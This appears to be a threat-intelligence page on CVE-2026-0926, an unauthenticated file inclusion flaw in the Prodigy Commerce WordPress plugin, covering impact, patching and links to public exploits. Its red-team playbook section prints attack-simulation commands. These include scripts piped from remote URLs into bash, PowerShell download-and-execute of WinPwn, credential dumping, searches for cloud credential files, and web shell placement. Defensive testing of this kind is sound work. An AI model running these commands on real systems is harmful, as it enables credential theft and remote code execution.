CVE-2026-0926
Overview
This vulnerability is a Local File Inclusion (LFI) flaw stemming from insufficient input validation in the Prodigy Commerce WordPress plugin. Specifically, the 'parameters[template_name]' parameter is improperly sanitized, allowing manipulation of file paths. The affected component is the template handling mechanism within the plugin's frontend code, which processes user-supplied template names without adequate restriction.
Vulnerability Description
The Prodigy Commerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the 'parameters[template_name]' parameter. This makes it possible for unauthenticated attackers to include and read arbitrary files or execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Impact
An unauthenticated attacker can exploit this LFI vulnerability to read arbitrary files on the server or execute arbitrary PHP code, potentially bypassing access controls and accessing sensitive data. The exploit requires no privileges or user interaction (CVSS vector: AV:N/AC:L/PR:N/UI:N), enabling remote code execution and full compromise of the affected web server. This could result in data breaches, unauthorized administrative access, and service disruption for sites using vulnerable versions of the Prodigy Commerce plugin.
Solution
Users should upgrade the Prodigy Commerce WordPress plugin to a version later than 3.3.0 where this vulnerability is addressed. Detailed remediation and patch information can be found in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/de255530-6b2d-426b-9f80-dbfebd2e3307. No official workaround is documented; immediate patching is recommended to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Prodigy Commerce plugin for WordPress arises from a Local File Inclusion (LFI) flaw, which allows attackers to manipulate the 'parameters[template_name]' parameter. This weakness can be exploited by unauthenticated users, enabling them to include and read arbitrary files from the server. The root cause of this vulnerability lies in insufficient input validation and sanitization, which permits the inclusion of files outside the intended directory. Attackers can leverage this flaw to execute PHP code embedded within the included files, leading to potentially severe consequences.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious request that alters the 'parameters[template_name]' parameter to point to sensitive files on the server, such as configuration files or logs that contain credentials or other sensitive information. Furthermore, if the server is configured to allow the upload of files, an attacker could upload a PHP file disguised as an image or other benign file type. Once uploaded, they could then use the LFI vulnerability to execute the PHP code within that file, leading to full server compromise. This scenario highlights the ease with which an attacker can exploit this vulnerability, especially in environments where security measures are lax.
The real-world impact of this vulnerability can be substantial, particularly for businesses that rely on the Prodigy Commerce plugin for their e-commerce operations. Successful exploitation can lead to unauthorized access to sensitive data, including customer information, payment details, and proprietary business logic. The ability to execute arbitrary code can also enable attackers to deploy malware, create backdoors for future access, or even deface websites. The potential for data breaches not only poses a direct financial risk but can also damage the organization's reputation, erode customer trust, and lead to regulatory penalties if sensitive data is compromised.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Prodigy Commerce plugin to the latest version is crucial, as newer releases often contain patches for known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious requests targeting the LFI vulnerability. It is also advisable to conduct regular security audits and penetration testing to identify and remediate vulnerabilities before they can be exploited. Furthermore, implementing strict file permissions and ensuring that only necessary files are accessible to the web server can significantly reduce the attack surface.
In conclusion, the Local File Inclusion vulnerability in the Prodigy Commerce plugin presents a critical risk to organizations utilizing this software. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention from security professionals. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems against this and other vulnerabilities, ensuring the integrity and security of their digital assets.
CSURFACE threat intelligence has identified a new development in the exploitation landscape of CVE-2026-0926 with the emergence of a publicly available proof-of-concept exploit hosted on GitHub. Although overall detection activity for this vulnerability has shown a significant reduction in our telemetry, the availability of this exploit code lowers the barrier to entry for attackers, potentially broadening the pool of threat actors capable of leveraging this Local File Inclusion flaw. This shift is critical because it may lead to an increase in opportunistic attacks, especially from less sophisticated adversaries who previously lacked the technical means to exploit the vulnerability. Despite a slight decline in the EPSS score, the presence of publicly accessible exploit tools sustains a persistent risk environment. Consequently, defenders should remain vigilant as the threat level remains elevated due to the increased ease of exploitation and the potential for rapid weaponization in automated attack campaigns.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-0926, coinciding with the recent publication of a detailed ExploitDB entry and the emergence of new proof-of-concept exploits on public repositories. Our telemetry indicates that these developments have lowered the technical barrier for threat actors, enabling a broader range of adversaries—including less sophisticated and opportunistic attackers—to leverage the Local File Inclusion vulnerability more effectively. The observed increase in exploitation activity and the rising EPSS score underscore a growing momentum in the threat landscape, signaling an elevated risk of widespread compromise. This shift is particularly significant as it may accelerate automated attack campaigns and increase the likelihood of successful breaches in environments running vulnerable versions of the Prodigy Commerce plugin. Defenders should recognize that the threat level has intensified due to the enhanced availability of exploitation tools and the expanding attacker base actively targeting this flaw.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Prodigy Commerce 3.3.0 - Local File Inclusion | Diamorphine | webapps | multiple | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
diamorphine666/CVE-2026-0926-exploit
CVE-2026-0926 exploit. The Prodigy Commerce plugin for WordPress Local File Inclusion
|
diamorphine666 | 0 | 0 | 2026-05-23 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
47%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-0926 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/de255530-6b2d-426b-9f80-dbfebd2e3307?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/prodigy-commerce/trunk/includes/frontend/shortcodes/class-prodigy-short-code-my-account.php#L69 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/prodigy-commerce/trunk/includes/frontend/class-prodigy-public.php#L491 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/prodigy-commerce/trunk/includes/helpers/class-prodigy-template.php#L55 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/prodigy-commerce/tags/3.2.9/includes/helpers/class-prodigy-template.php#L55 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3464655/ |